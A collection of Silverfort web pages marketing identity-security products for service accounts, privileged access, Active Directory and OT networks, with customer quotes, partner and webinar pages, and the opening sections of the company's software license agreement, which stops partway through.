"Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel
“With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture.” Katie McMillan, Information Security Manager | Agilisys
---
- Published: 2025-02-18
- Modified: 2025-07-21
- URL: https://www.silverfort.com/platform/non-human-identity-security/
Non-Human Identity Security: every non-human identity—in view and in control. Discover and scale protection to all non-human identities in your identity infrastructure with a single click. Cloud and on-prem. Known and unknown.
We protect all non-human identities, no matter the scale or complexity. Uncover all your machine identities, service accounts and other NHIs for stronger protection. Gain accurate insight into their behavior, protect at scale with auto-generated policies, and stop attackers from moving laterally.
- Complete visibility over every NHI—even unknowns: you can’t protect what you can’t see. Uncover your full inventory of NHIs. Map destinations, sources, privilege levels and security posture.
- Lateral movement prevention: place a virtual fence around each service account to block access when it deviates from its standard behavior.
- Single-click protection for scale: seamlessly protect privileged service accounts without rotating their passwords, avoiding the risk of breaking the processes they manage.
"Service accounts are a security nightmare because you can’t put MFA on them. Silverfort was able to protect what no one else can. Of the security tools that we use, Silverfort has a very high return on investment.” Tom Parker, VP of IT & CISO, Kayak
Automatically discover and secure every NHI in your environment—no exceptions.
- Uncover every non-human identity. See all the non-human identities in your environments, with granular insights into their activities, risk indicators and usage patterns.
- Classify and prioritize. Uncover the different types of NHIs and their behavior to build a protection roadmap that aligns with your needs.
- Protect with virtual fencing. Apply and enforce virtual fences to block any deviation that stems from a compromise.
- Automate to scale with Smart Policy. Scale protection to multiple service accounts in a single click with our Smart Policy.
How Silverfort identifies, validates and protects NHIs: take a tour of NHI Security.
---
- Published: 2025-02-17
- Modified: 2025-02-25
- URL: https://www.silverfort.com/scrolling-test/
Automatically discover and protect every service account in your environment—no exceptions.
- Uncover every non-human identity. See all the non-human identities in your environments, with granular insights into their activities, risk indicators and usage patterns.
- Classify and prioritize. Uncover the different types of NHIs and their behavior to build a protection roadmap that aligns with your needs.
- Protect with virtual fencing. Apply and enforce virtual fences to block any deviation that stems from a compromise.
- Automate to scale with Smart Policy. Scale protection to multiple service accounts in a single click with our Smart Policy.
---
- Published: 2025-02-16
- Modified: 2025-07-21
- URL: https://www.silverfort.com/use-cases/ot-networks/
OT Network protection: identity security for OT networks. Enhance the resilience of your OT networks by securing their convergence interfaces with the IT network at layer 3.5 and securing engineer and service account access in the production zone.
Identity security is mission critical. Silverfort enables you to secure the full identity attack surface of your OT networks, from continuous discovery and removal of exposures to proactive prevention of malicious access.
- Identity DMZ. Implement identity segmentation on zone 3.5 to maintain strict access control between IT and OT zones, on top of the existing network-based separation, for both human operators and service accounts.
- Production zone secure access. Enforce FIDO2 MFA policies for login to resources on zones 2 and 3, and use virtual fencing to ensure that the service accounts that manage the flow of operational data are not being abused.
- Exposure management and threat protection. Monitor continuously to find and resolve security weaknesses that expose your user accounts to compromise, and stop malicious access attempts in real time.
How it works: secure all user access.
- Comprehensive admin access protection. Map all admins that perform cross-zone connections, confine their access to predesignated resources only, and continuously monitor their security posture to ensure their resilience.
- MFA for air-gapped networks. Configure MFA policies that don’t depend on Internet connectivity to operate, using FIDO2 hardware tokens to access engineering workstations, SCADA servers and other production resources.
- Stop ransomware spread. Combine MFA and Authentication Firewall policies to block ransomware’s lateral movement that could originate from the IT portion of the environment and endanger production processes.
---
- Published: 2025-02-14
- Modified: 2025-05-13
- URL: https://www.silverfort.com/why-silverfort/
Where identity meets security: maximum security, minimal effort. Identity security done right. Discover exposures and stop attacks before they cause damage. Enforce security controls across all IAM silos. All in a single platform.
Why choose the Silverfort Identity Security Platform:
- 10B authentications analyzed and protected every day.
- 34K real identity exposures and threats detected on average per customer.
- 17x faster deployment compared to traditional solutions on average.
The #1 attack surface: yesterday’s solutions cannot solve today’s identity security challenges.
- Silos and point solutions: patchworks and one-off solutions leave you exposed and create a large attack surface.
- Critical security blind spots: you can’t secure what you can’t see. Existing solutions leave non-human identities, command-line interfaces, IT/OT infrastructure and more unprotected.
- Endless effort and cost: current tools are expensive, disruptive and take years to implement, resulting in countless security gaps.
No more patchworks and one-offs. Break the silos and secure without limits. Finally, a complete identity security platform that covers all identities, all resources and all environments—freeing you to focus on what’s next.
- All you need in one platform: replace point solutions with a single platform for all human and non-human identities, on-prem and in the cloud.
- Secure every identity and resource: enable security controls like MFA and JIT where no other solution can, from legacy systems to command-line tools.
- Faster and easier: no more endless implementations and user interruptions. Deploy seamlessly without modifying your existing systems.
Protect the unprotectable: LDAP apps, network devices, local accounts, shared network drives, legacy systems, Remote PowerShell, service accounts, databases, IT infrastructure, PsExec, vCenter, RDP, SSH, Run as admin, OT systems, WMI.
Finally, a platform for both identity and security teams. You shouldn’t have to choose between security and productivity. We built a platform that IAM teams can operate and security teams can trust.
- For security teams: stop attacks before they spread. Detect and prevent account takeover, privilege escalation and lateral movement with the most advanced identity security controls, fully integrated with your tools and processes.
- For IAM teams: one platform for every identity. Discover every identity for complete observability. Enforce protection without modifications or disruptions. Resolve hygiene issues, fill compliance gaps and demonstrate immediate value.
Proven technology, trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together.
"It’s amazing how simple it was to deploy Silverfort—it only took a few hours to get up and running. As a result of Silverfort, our admin users are protected with strong MFA controls, and we closely monitor any malicious use of authentication protocols." Lee Humphreys, Infrastructure Security Architect | London Borough of Waltham Forest
“We highly recommend Silverfort, as the identity insights you get, the flexibility for policy enforcement, and the granularity have been critical for our success in protecting our environments.” Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson
“Since deploying Silverfort, we have applied security controls and MFA protection to legacy applications, a vital step in improving our environments against ransomware threats." Kurt Gielen, IT Manager | ZOL
“Silverfort’s authentication firewall has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources.” Head of IAM, Leading Retail Organization
Identity security that works for you. Go beyond the limits of traditional identity security. Set up a demo to experience unified protection that stops identity-based attacks.
---
- Published: 2025-02-12
- Modified: 2025-05-13
- URL: https://www.silverfort.com/customer-stories/
Customer stories: finally, the identity security platform you deserve. Discover how organizations around the world rely on Silverfort to transform their identity security. Read their stories and see the results for yourself.
We help Kayak protect what no one else can.
Kayak’s Tom Parker, VP of IT & CISO, and Austin Michaels, Security Engineer, explain how Silverfort enabled them to extend MFA to on-prem apps and command-line access as well as put real-time protection on service accounts. Watch the case study.
We help Huntsville Hospital protect what matters most. Huntsville Hospital’s CIO, Rick Corn, and IT Security Officer, Ryan Petraszewsky, discuss how Silverfort helped them to implement real-time protection against identity-based attacks on all critical healthcare operations, protecting even the most sensitive resources and data. Watch the case study.
Case studies: browse our full library.
---
- Published: 2025-02-07
- Modified: 2025-08-18
- URL: https://www.silverfort.com/newsroom/
News and press: latest news from Silverfort. Want to find out what Silverfort has been up to? You've come to the right place. Contact our PR team.
- June 18, 2025: Silverfort unveils AI Agent Security to protect agentic identities, securing MCP deployments with inline, dynamic security controls (Company News, Press Release, Product Release).
- June 5, 2025: Silverfort Appoints Howard Greenfield as President & Chief Revenue Officer (Company News, Press Release).
Let's connect: Alicia Divittorio, Head of Global Corporate Marketing.
---
- Published: 2025-02-06
- Modified: 2025-07-21
- URL: https://www.silverfort.com/use-cases/securing-privileged-user-access/
Securing privileged access: critical users, constant protection. Detecting and blocking malicious authentications as they happen is the only way to protect your environment against the lateral movement attacks that cut through endpoint and network defenses.
Privileged users—monitored and protected. Silverfort puts the critical task of protecting admin users within reach: automated discovery and virtual fencing policies for both human user and service accounts enable you to achieve full protection in a rapid, seamless manner.
- Automated discovery and mapping: unveil all admin accounts based on actual user activity, so you don’t limit protection only to the ones you’re aware of.
- Virtual fencing policies: activate access policies that confine your admin accounts to access only the resources within their access tiers or standard activity, blocking access to any other resource.
- Continuous monitoring and threat detection: gain insight into any weakness that exposes your admins to compromise, and detect any attempted malicious credential access, privilege escalation, and lateral movement TTPs.
How it works: end-to-end admin access protection.
- Secure privileged service accounts. Locate all your privileged service accounts and group them in a policy that binds their access to the critical resources they manage, not allowing them to access any other.
- Enforce tiered access on your admins. Configure access policies for your tier 0 and tier 1 admins to limit their access to resources within their tiers only, to proactively limit the blast radius in a compromise scenario.
- Safeguard access with JIT and MFA. Activate additional security layers for admin access to resources within their tier, with a JIT mechanism that enables their account upon access request, and MFA to mitigate the risk of compromise.
---
- Published: 2025-02-05
- Modified: 2025-07-21
- URL: https://www.silverfort.com/use-cases/active-directory-protection/
Active Directory Protection: see, know, and secure every user access. Automatically discover all your users and service accounts and enforce identity access controls on every critical resource, from command-line access to file shares, legacy apps, IT infrastructure and many more.
Protect the unprotectable. Silverfort natively integrates with your Active Directory, so you get visibility, risk analysis and enforcement on every user access to your critical resources.
- Identify threat exposures: discover and resolve security weaknesses that expose your user accounts to malicious credential access, privilege escalation, or lateral movement.
- Privileged access security: safeguard your privileged admins and service accounts with automated discovery and enforcement of least-privileged access policies within days from initial deployment.
- MFA without limits: apply MFA policies to every AD-managed resource, regardless of the underlying authentication protocol, and protect any access method from direct login to command-line access.
How it works: every user, every resource.
- Increase AD hygiene. Discover stale users and machines, failed authentications, misconfigurations, malpractices, and legacy settings that burden your DCs, to optimize operation and avoid resource consumption.
- Enforce identity segmentation. Configure granular access policies to ensure that your users don’t have excessive access to resources they don’t need, and restrict your admins’ access to resources within their designated tier.
- Prevent malicious access. Use Deny Access policies for service accounts and MFA for your human users to mitigate the risk of malicious access with compromised credentials to any resource.
---
- Published: 2025-02-05
- Modified: 2025-07-21
- URL: https://www.silverfort.com/use-cases/service-account-security/
Securing Active Directory service accounts: visibility and protection without limits. Easily discover, classify, and secure your AD service accounts. Gain full visibility into their activities and enforce virtual fencing policies to secure them against compromise.
No longer a blind spot. Overcome all the traditional difficulties of service account protection and turn what was once a painstaking manual effort into an easy, automated task.
- Visibility into all accounts: automate the discovery of each and every service account in your environment, its type, privilege level, and security posture.
- Activity mapping: drill down to find your service accounts’ sources and destinations to discover the processes they support and any application dependencies.
- Protection at scale: apply auto-generated policies to protect multiple accounts in a single click, confining them to their designated destinations and blocking any access outside this scope.
How it works: from visibility to protection, the whole journey made easy.
- Discover and classify. See all your service accounts with zero manual effort. Get deep insights into their types, activity patterns, any potential misuse, and indicators of potential risk.
- Map and prioritize. Single out the accounts that matter most based on their access privileges, target services, and other parameters of choice, so your critical accounts are first in line to be protected.
- Protect and scale. Group accounts of your choice under a smart policy that can detect when each of them deviates from its access baseline and either alerts or blocks its access. Add more accounts to this policy as you gradually progress in coverage.
---
- Published: 2024-12-02
- Modified: 2025-08-21
- URL: https://www.silverfort.com/pas-signup/
Start your journey with Silverfort’s Privileged Access Security (PAS). Your PAS journey starts here. Silverfort offers a new approach to overcoming the limitations of traditional PAM solutions by enabling you to instantly discover and classify all privileged accounts, ensuring that no account goes unnoticed. Silverfort provides comprehensive security capabilities designed to protect privileged users from being compromised.
Whether used alongside existing PAM solutions for full coverage or as a standalone solution, Silverfort enhances organizational resilience by closing critical security gaps and simplifying the protection of privileged access. window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "4f770e54-0cb3-424d-aa65-2653f52539ba", target: "#hbspt-form-4f770e54-0cb3-424d-aa65-2653f52539ba", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-4f770e54-0cb3-424d-aa65-2653f52539ba"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Rapid, automatic, continuous privileged access security. Leave no account behind. Our patented technology discovers, classifies and protects privileged accounts end-to-end from within the IAM infrastructure, so you get broad, real-time protection within days. Automated discovery Automatically detect all privileged accounts based on actual access privileges and easily determine if accounts are being used outside of their intended purposes. Least & Just-in-Time privileges Grant access rights only when and to what’s necessary, ensuring accounts are unusable by default to achieve zero standing privileges at scale. Rapid deployment Deploy seamlessly into existing environments for rapid time-to-value and a streamlined user experience with Silverfort’s unique architecture. 
---
- Published: 2024-11-14
- Modified: 2025-07-21
- URL: https://www.silverfort.com/platform/privileged-access-security/

Privileged access security (PAS). Go beyond managing your privileged accounts. Secure them. Don’t wait until it’s too late. Discover, classify and enforce least privilege and Just-In-Time (JIT) access policies for all your privileged users within days.

Rapid, automatic, continuous privileged access security. Leave no account behind. Our patented technology discovers, classifies and protects privileged accounts end-to-end from within the IAM infrastructure, so you get broad, real-time protection within days.
- Automated discovery: Automatically detect all privileged accounts based on actual access privileges and easily determine if accounts are being used outside of their intended purposes.
- Least & Just-in-Time privileges: Grant access rights only when and to what’s necessary, ensuring accounts are unusable by default to achieve zero standing privileges at scale.
- Rapid deployment: Deploy seamlessly into existing environments for rapid time-to-value and a streamlined user experience with Silverfort’s unique architecture.

One of identity security’s biggest challenges: solved.
- Discover: Discover and classify all your privileged accounts. Automate the discovery and classification of all privileged accounts based on actual authentication activity. Prioritize and implement security controls tailored to each tier while detecting privilege escalation potential. Detect actual access usage patterns and behavior to classify different user tiers.
- Protect: Fence all your privileged accounts to their intended purpose. Restrict admin account usage to specific sources, destinations, and protocols to minimize risk. Limit the misuse of admin accounts outside their intended purpose and block lateral movement attempts. Prevent privilege escalation and cross-tier access with a single click.
- Mitigate: Enforce frictionless Just-in-Time (JIT) access policies at scale. Remove standing privileges by granting access rights only when necessary. Reduce the risk of overexposure and unnecessary access by enforcing strict privilege limitations and access boundaries. Eliminate the need to deploy complex security controls such as password rotation and vaulting.

---
- Published: 2024-11-04
- Modified: 2025-04-16
- URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/the-greco-group/

Silverfort’s Cyber Insurance Ecosystem: The GrECo Group. The GrECo Group, an independent and owner-managed company, is the leading risk consultant and insurance broker for corporations, associations and authorities in CEE. Currently, 67 subsidiaries and approx. 1,300 employees in 19 countries are managed from the company’s headquarters in Vienna. Through its global network of insurance specialists, GrECo nova, GrECo is also represented internationally in 150 countries worldwide.

How Silverfort and GrECo work together: We offer progressive and tailored solutions that meet the individual needs and requirements of our clients. Our goal is to support companies in identifying, assessing and effectively managing their risks. Our team consists of highly qualified professionals who are distinguished by their industry expertise and dedication. We are committed to going beyond to ensure sustainable results for our clients. Together with Silverfort, we can take cyber security to the next level for our clients by providing the right cyber insurance solution at an affordable price.
---
- Published: 2024-10-25
- Modified: 2024-11-04
- URL: https://www.silverfort.com/how-to-comply-with-the-cyber-insurance-mfa-checklist-thn-hpage-q4/

Everyone knows the value of cyber insurance, but keeping up with cyber insurance requirements can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. We’re here to help you make sense of what you’ll need. This eBook explains:
- What types of MFA are required for cyber liability insurance
- How to evaluate cyber insurance solutions
- How to comply with MFA insurance requirements with minimal disruption to your network

---
- Published: 2024-10-09
- Modified: 2025-08-01
- URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/howden/

Silverfort’s Cyber Insurance Ecosystem: Howden. Founded in 1994, Howden is now a leading global insurance group with 18,000 employees, managing $38bn in premiums. Howden offers innovative insurance solutions, creating unique terms and comprehensive concepts such as its cyber protection offering, backed by a network of external specialists and premium support.

How Silverfort and Howden work together: Silverfort helps Howden significantly reduce cyber risk for its insureds, allowing for better policy terms and improving the identity security stack. Silverfort is part of Howden’s Cyber+ offering, allowing SMB organizations to quickly and easily get insurance coverage.

Exclusively for Howden clients: get a free identity security assessment with Silverfort. Silverfort’s free identity security assessment can help Howden clients discover and resolve gaps in their MFA and privileged access protection, and help discover and secure service accounts.

---
- Published: 2024-10-02
- Modified: 2024-11-04
- URL: https://www.silverfort.com/ransomware-stoppen-bevor-es-zu-spat-ist-dach-webinar-october-2024/

Focus on on-premises MFA and service accounts. Ransomware attacks are not a question of "if" but of "when". In this webinar, learn how on-premises MFA and service account protection can effectively prevent ransomware from spreading. Lateral movement is the decisive factor that escalates a ransomware attack from a mere nuisance into a serious enterprise-level incident. Once limited to Advanced Persistent Threat (APT) actors, lateral movement techniques are now involved in more than 80% of all ransomware attacks worldwide. But what is driving this massive rise in lateral movement? And why are the sophisticated security controls implemented in many organizations today unable to stop this threat? Hear the answers in this webinar. Learn how to do better and close the security gaps in your organization before it is too late!

Agenda highlights:
- How lateral movement has become the most critical risk to your IT environment.
- Why extending MFA and protecting service accounts are essential to stopping attackers from moving around undetected.
- Why identity-focused protection is the only way to effectively stop lateral movement and the spread of ransomware.

---
- Published: 2024-10-02
- Modified: 2024-11-04
- URL: https://www.silverfort.com/webinar-on-demand-ransomware-stoppen-bevor-es-zu-spat-ist-dach-october-2024/

Stopping ransomware before it is too late: focus on on-premises MFA and service accounts.

---
- Published: 2024-09-30
- Modified: 2024-11-04
- URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-thn-audc-q4/

In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot and a veritable goldmine for attackers. Download this eBook to learn:
- Why service accounts are so difficult to protect.
- Which approaches currently exist to mitigate this risk, and their limitations.
- How to automatically discover, monitor and protect every service account in your environment.

---
- Published: 2024-09-30
- Modified: 2024-11-04
- URL: https://www.silverfort.com/overcoming-the-security-blind-spots-of-service-accounts-thn-lnk-q4/

In today’s rapidly evolving cybersecurity landscape, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot and a veritable goldmine for attackers. Download this eBook to learn:
- Why service accounts are so difficult to protect.
- Which approaches currently exist to mitigate this risk, and their limitations.
- How to automatically discover, monitor and protect every service account in your environment.

---
- Published: 2024-09-26
- Modified: 2025-07-21
- URL: https://www.silverfort.com/use-cases/identity-first-incident-response/

Identity-first incident response. Incident halted. Response accelerated.
Block lateral movement, detect and isolate compromised users, and accelerate recovery in Active Directory environments under attack, because in an incident every second counts. It’s like having a firewall on your domain controllers.

The missing piece in your IR toolkit. Silverfort integrates seamlessly with IAM systems so you can start the response process by pinpointing and containing compromised accounts. Stop attackers in their tracks, freeze malicious activity and investigate the incident with real-time, actionable telemetry, without killing productivity.
- Instant containment: Flip the script on identity response by instantly isolating malicious presence with MFA and Authentication Firewall policies on all users and resources. Block the attack from spreading with a single click.
- Effortless detection: Let attackers reveal their presence through denied access attempts or blocked MFA challenges. Investigate without disturbing business operations and trace the attacker’s movements back to patient zero.
- Rapid deployment: Get identity-first incident response within hours of deploying our platform, even in the most complex multi-domain environments with hundreds of Domain Controllers.

How it works: start your IR process with identity.
- Lock down without killing productivity: Take action immediately by leveraging the combined power of MFA and Authentication Firewall to stop an attack in its tracks, regardless of lateral movement TTPs or tools. Eliminate the need for lengthy investigations by containing the attack before compromised accounts have been identified.
- Easily identify compromised accounts: Use denied MFA and blocked access attempts to home in on compromised accounts. Our detailed audit trail can help you trace the attacker’s path back to patient zero, so you can focus your forensic efforts on the affected endpoints.
- Recover and remediate at your own pace: Maintain critical security measures while you restore user access and mitigate any identity-related security weaknesses exploited during the attack, such as shadow admins, unmonitored service accounts, and unconstrained delegation.

Free resource: Fortifying identity protection: The Silverfort Identity IR Playbook. While there’s an established IR playbook to handle the malware and network aspects of cyberattacks, the identity aspect is lacking. There are no common procedures to identify compromised user accounts and prevent attackers from using them to spread within the targeted environment rapidly and efficiently. Our Identity IR playbook fills this gap, combining real-world solutions and tactics with the experiences of multiple customers who have used it to expedite and optimize their IR processes.
- Step-by-step playbook for IR success: From containment to recovery, we cover it all.
- Zoom in to service accounts and NHIs: Get unique insights into your NHIs and how to tackle them in an incident.
- Flip the script on IR: Don’t wait until it’s too late. Start the IR process with a complete malicious access lockdown.
---
- Published: 2024-09-25
- Modified: 2024-11-04
- URL: https://www.silverfort.com/cyber-identity-risk-assessment-journeyteam/

Identify MFA and privileged access protection gaps with JourneyTEAM and Silverfort. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment, including:
- Administrative users that require MFA protection
- Service accounts’ inventory, privileges, and activities
- Identity protection hygiene issues and exposed attack surfaces
- Active identity threats that take place in your environment

---
- Published: 2024-09-23
- Modified: 2025-08-21
- URL: https://www.silverfort.com/silverfort-software-license-agreement/

BY CLICKING “I AGREE” OR BY INSTALLING, ACCESSING AND/OR USING THE SILVERFORT IDENTITY PROTECTION SOFTWARE PLATFORM, YOU EXPRESSLY ACKNOWLEDGE AND AGREE THAT YOU, OR THE COMPANY YOU REPRESENT (“YOU” OR "LICENSEE") ARE ENTERING INTO A LEGAL AGREEMENT WITH SILVERFORT, INC. OR ANY OF ITS WHOLLY OWNED SUBSIDIARIES, INCLUDING SILVERFORT LTD., SILVERFORT PTE. LTD. OR SILVERFORT GMBH, AS APPLICABLE (“SILVERFORT”), AND HAVE UNDERSTOOD AND AGREE TO COMPLY WITH, AND BE LEGALLY BOUND BY, THE TERMS AND CONDITIONS OF THIS AGREEMENT, AS AMENDED FROM TIME TO TIME ("AGREEMENT"). SILVERFORT AND LICENSEE MAY EACH BE INDIVIDUALLY REFERRED TO HEREIN AS A “PARTY” AND COLLECTIVELY AS THE “PARTIES”. YOU HEREBY WAIVE ANY APPLICABLE RIGHTS TO REQUIRE AN ORIGINAL (NON-ELECTRONIC) SIGNATURE OR DELIVERY OR RETENTION OF NON-ELECTRONIC RECORDS, TO THE EXTENT NOT PROHIBITED UNDER APPLICABLE LAW. IF YOU HAVE ALREADY ENTERED INTO A SEPARATE WRITTEN LICENSE AGREEMENT DIRECTLY WITH SILVERFORT, IN CONNECTION WITH THE ACCESS TO OR USE OF THE SOFTWARE, THEN THIS AGREEMENT SHALL NOT APPLY. SILVERFORT MAY AT ANY TIME UPDATE THIS AGREEMENT BY POSTING AN UPDATED AGREEMENT, WITHIN THE SOFTWARE (“UPDATED AGREEMENT”).
ANY UPDATED AGREEMENT WILL BE EFFECTIVE AS OF THE DATE MENTIONED WITHIN SUCH UPDATED AGREEMENT AND YOUR CONTINUED USE OF THE SOFTWARE WILL CONSTITUTE YOUR CONSENT TO BE BOUND BY THE UPDATED AGREEMENT. IF YOU HAVE PURCHASED THE LICENSE GRANTED HEREUNDER FROM A PARTNER, RESELLER OR DISTRIBUTOR AUTHORIZED BY SILVERFORT (“PARTNER”), TO THE EXTENT THERE IS ANY CONFLICT BETWEEN THIS AGREEMENT AND THE AGREEMENT ENTERED BETWEEN YOU AND THE RESPECTIVE PARTNER, INCLUDING ANY PURCHASE ORDER (“PARTNER ORDER FORM”), THEN, AS BETWEEN YOU AND SILVERFORT, THIS AGREEMENT SHALL PREVAIL. ANY RIGHTS GRANTED TO YOU IN SUCH PARTNER ORDER FORM WHICH ARE NOT CONTAINED IN THIS AGREEMENT, APPLY ONLY IN CONNECTION WITH SUCH PARTNER. IN THAT CASE, YOU MUST SEEK REDRESS OR REALIZATION OR ENFORCEMENT OF SUCH RIGHTS SOLELY WITH SUCH PARTNER AND NOT SILVERFORT. THE TERMS & CONDITIONS OF THIS AGREEMENT SHALL GOVERN AND REPLACE ANY TERMS & CONDITIONS CONTAINED IN ANY OTHER DOCUMENTS PROVIDED BY LICENSEE.

1. Definitions

1.1. “Affiliate” means any entity which directly or indirectly controls, is controlled by or is under common control with a Party, where "control" means owning 50% or more of the voting securities of such entity.

1.2. “Documentation” means any materials that Silverfort provides or makes available to Licensee, which contain instructions on how to utilize the Software.

1.3. “Licensee Data” means any data or data logs containing identifiable information regarding the activity of Licensee’s individual users (such as usernames, service names or network addresses) within the Software.

1.4. “Licensee Order Form” means, as applicable, any written or electronic order form (i) issued by Silverfort and agreed to by Licensee or (ii) issued by Licensee in full compliance with and pursuant to a Proposal made by Silverfort to Licensee, each for the provision by Silverfort of a license for the Software and/or the Support Services.

1.5. “Order Form” means either a Partner Order Form or a Licensee Order Form, as applicable.

1.6. “Proposal” means any written or electronic price proposal, made by Silverfort to Licensee, setting forth the scope and price of the license for the Software and/or the provision of the Support Services, as applicable.

1.7. “Protected and Monitored User Accounts” means the Licensee’s user accounts, as well as service accounts, which are audited, analyzed and/or secured by the Software.

1.8. “Support Services” means any support services provided by Silverfort to Licensee, as set forth in the applicable Order Form.

1.9. “Software” means Silverfort’s Identity Protection Software Platform, either installed on premises with the Licensee, in machine-readable, object code format only (“On-premise Software”) OR provided in the form of cloud-based software-as-a-service ("SaaS Software”). The term “Software” shall also include, if applicable, Software Updates.

1.10. “Software Updates” means any updates, upgrades, modifications, improvements, enhancements, new versions, new releases and corrections to the Software and any derivative works based on the Software, including, in each case, any error corrections, patches and bug fixes.

1.11. “Usage Data” means any metrics, analytics, statistics, information or data related to the use or operation of the Software, collected or otherwise obtained by Silverfort.

2. License & Subscription

2.1. Software License & Subscription. Subject to the terms and conditions of this Agreement and the Order Form, Silverfort hereby grants Licensee a non-exclusive, non-sublicensable, non-transferable, revocable license OR revocable subscription (as applicable), for the duration of the Term (as defined below), to use the Software solely in object code format or SaaS form, and for internal business security purposes only (“License”).
The License shall be limited to the maximum number of Protected and Monitored User Accounts specified in the Order Form, which may be assigned to members of either Licensee or Licensee’s Affiliates in accordance with all the terms and conditions of this Agreement. The Software will be deemed accepted upon delivery.

2.2. Documentation. During the Term, Licensee (and its relevant Affiliates) may use the Documentation solely for Licensee’s internal business security purposes and in connection with Licensee’s use of the Software.

2.3. Reservation of Rights. Other than the limited rights explicitly granted under this Agreement, Licensee shall have no rights, express or implied, in the Software or the Documentation and all such rights are reserved by Silverfort.

2.4. Use Restrictions. Licensee shall not, directly or indirectly: (i) sell, lease, sublicense or distribute the Software, or any part thereof, or otherwise transfer the Software, or any part thereof, or allow any third party to use the Software, or any part thereof, in any manner; (ii) install or access the Software, or any part thereof, on a server not owned by, under the control of and/or possession of Licensee or its Affiliates; (iii) reverse engineer, decompile, disassemble or otherwise reduce to human-perceivable form the Software’s source code, or any part thereof; (iv) copy (save for a backup copy of the On-premise Software, as may be necessary for its lawful use under and in accordance with this Agreement, the location of which shall always be monitored and subject to the limitations hereunder), modify, revise, enhance or alter the Software, or any part thereof; (v) make the Software, or any part thereof, accessible to other users or the public; (vi) circumvent, disable or otherwise interfere with security-related features of the Software, or any part thereof, or features that prevent or restrict use or copying of any content or that enforce limitations on use of the Software, or any part thereof; (vii) interfere or attempt to interfere with the integrity or proper working of the Software, or any part thereof; (viii) remove, alter or obscure any proprietary notice displayed on or via the Software, or any part thereof; (ix) use the Software, or any part thereof, to violate any applicable laws; (x) represent that it possesses any proprietary interest in the Software, or any part thereof; (xi) publish or disclose to any third party any: reviews, testing results, information, or the results of any benchmark test of the Software, or any part thereof, without Silverfort’s express prior written consent; (xii) attempt to circumvent or otherwise bypass the maximum number of Protected and Monitored User Accounts set forth in the Order Form; (xiii) transmit or upload through the Software any viruses, trojan horses, worms, time bombs, cancelbots or any other programs with the intent or effect of damaging, destroying, disrupting or otherwise impairing the Software or any other person’s or entity’s data, network, computer system or other equipment; and/or (xiv) solicit, encourage, permit, allow or assist any person to do any of the foregoing.

2.5. Open-Source Licenses. The Software includes certain open-source code software and materials that are subject to their respective open source licenses. A list of third-party open-source software and related open source licenses will be available on Silverfort’s online customer portal (or similar location) as may be updated from time to time by Silverfort.

2.6. Software Updates. Silverfort may, from time to time and in its sole discretion, deliver Software Updates to Licensee, provided that such Software Updates will not materially reduce the level of performance, security or availability of the Software. Silverfort shall also update the Documentation to reflect any such Software Updates and make such updated Documentation available to Licensee.
For the avoidance of doubt: (i) updates to the SaaS Software will be made automatically by Silverfort, in its sole discretion; (ii) if a Licensee, using the On-Premise Software, does not install Software Updates, Silverfort cannot commit to providing any continued support and/or maintenance to older On-premise Software versions; however, Silverfort will make reasonable efforts to support Software versions which are no more than 6 months older than the most recent version of the On-premise Software.

2.7. Support Services. Subject to the terms hereunder, Silverfort shall provide Support Services if and as provided in any Order Form only.

3. Licensee Data and Analytics Information

3.1. The Software may monitor Licensee Data in order to detect and prevent cyber threats. Licensee is the exclusive owner of all Licensee Data. To the extent any Licensee Data is made available to Silverfort, Licensee hereby grants Silverfort a non-exclusive, irrevocable, non-sublicensable, royalty-free, fully paid-up right and license to use such Licensee Data, in order to perform Silverfort’s obligations hereunder and under the Order Form (including the provision of the Software and any Software Updates).

3.2. Licensee represents and warrants that, to the extent Licensee Data includes personally identifiable information (as defined in applicable data privacy laws) (“Personal Data”), Licensee has the appropriate legal bases and required consents and has acted in compliance with all applicable privacy laws and regulations (including the EU’s General Data Protection Regulation (“GDPR”)), so as to allow Silverfort to receive (including transfers outside of the European Economic Area), process and use such Licensee Data solely in order to perform Silverfort’s obligations hereunder. In the event a data processing agreement is required under GDPR, the terms of the standard Data Processing Agreement available at https://www.silverfort.com/wp-content/uploads/2024/01/Silverfort-DPA-for-Clients-Online-Jan-2024.pdf (“DPA”) shall apply.

